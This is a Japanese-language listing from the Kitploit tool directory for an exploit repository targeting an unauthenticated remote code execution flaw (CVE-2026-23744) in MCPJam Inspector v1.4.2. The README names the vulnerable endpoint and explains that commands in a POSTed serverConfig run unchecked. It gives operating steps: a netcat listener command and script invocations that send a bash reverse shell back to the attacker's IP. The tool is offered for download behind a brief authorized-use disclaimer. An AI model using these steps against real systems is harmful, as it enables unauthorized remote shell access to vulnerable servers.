Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-RCE — このユーティリティは、MCPJam v1.4.2 に関連する研究の中で作成されました。このアプリケーションは、サーバー構成オブジェクトを受け入れるAPIエンドポイントを公開しています。特定の条件下では、不十分な検証により、意図しないコマンドが実行される可能性があります。 | Kitploit
ツール/GitHubGitHub/alisster00/cve-2026-23744-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

このユーティリティは、MCPJam v1.4.2 に関連する研究の中で作成されました。このアプリケーションは、サーバー構成オブジェクトを受け入れるAPIエンドポイントを公開しています。特定の条件下では、不十分な検証により、意図しないコマンドが実行される可能性があります。

リポジトリを見る
1114ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

MCPJam Inspector v1.4.2 - RCEエクスプロイト

脆弱性の説明

MCPJam Inspectorには、/api/mcp/connect エンドポイントに認証不要のリモートコード実行(RCE)脆弱性があります。この脆弱性により、攻撃者は悪意のあるMCPサーバー設定ペイロードを送信することで任意のコマンドを実行できます。

このエンドポイントは、serverConfig オブジェクトを含むJSONペイロードを受け入れ、そのオブジェクトには command と args 配列が含まれており、適切な検証やサニタイズなしでシステム上で直接実行されます。

影響を受けるバージョン

  • MCPJam Inspector v1.4.2 およびそれ以前の可能性のあるバージョン

使用方法

前提条件

  • Python 3.6+
  • requests ライブラリ: pip install requests
  • リスナー用の netcat または socat

クイックスタート

端末1 - リスナーを起動:

nc -lvnp 4444

端末2 - エクスプロイトを実行:

python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

例

# Default (port 6274, callback port 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# Custom MCPJam port
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# Custom listener port
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

動作の仕組み

  1. スクリプトは対象のMCPJamにアクセス可能か確認します
  2. bashリバースシェルを含む悪意のあるMCPサーバーペイロードを構築します
  3. ペイロードを /api/mcp/connect エンドポイントに送信します
  4. MCPJamがコマンドを処理し、リバースシェルコールバックを開始します
  5. ユーザーはリスナー上でインタラクティブシェルを受け取ります

免責事項

⚠️ 免責事項:

このエクスプロイトは教育および許可されたセキュリティテスト目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。ユーザーは以下の責任を単独で負います:

  • システムをテストする前に適切な許可を取得すること
  • すべての適用される法律および規制の遵守
  • 誤用による損害または法的結果

作者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。自己責任で使用してください。

技術的詳細

  • 脆弱なエンドポイント: /api/mcp/connect
  • メソッド: POST
  • 認証: 不要
  • 影響: 認証不要のリモートコード実行
ツールをダウンロード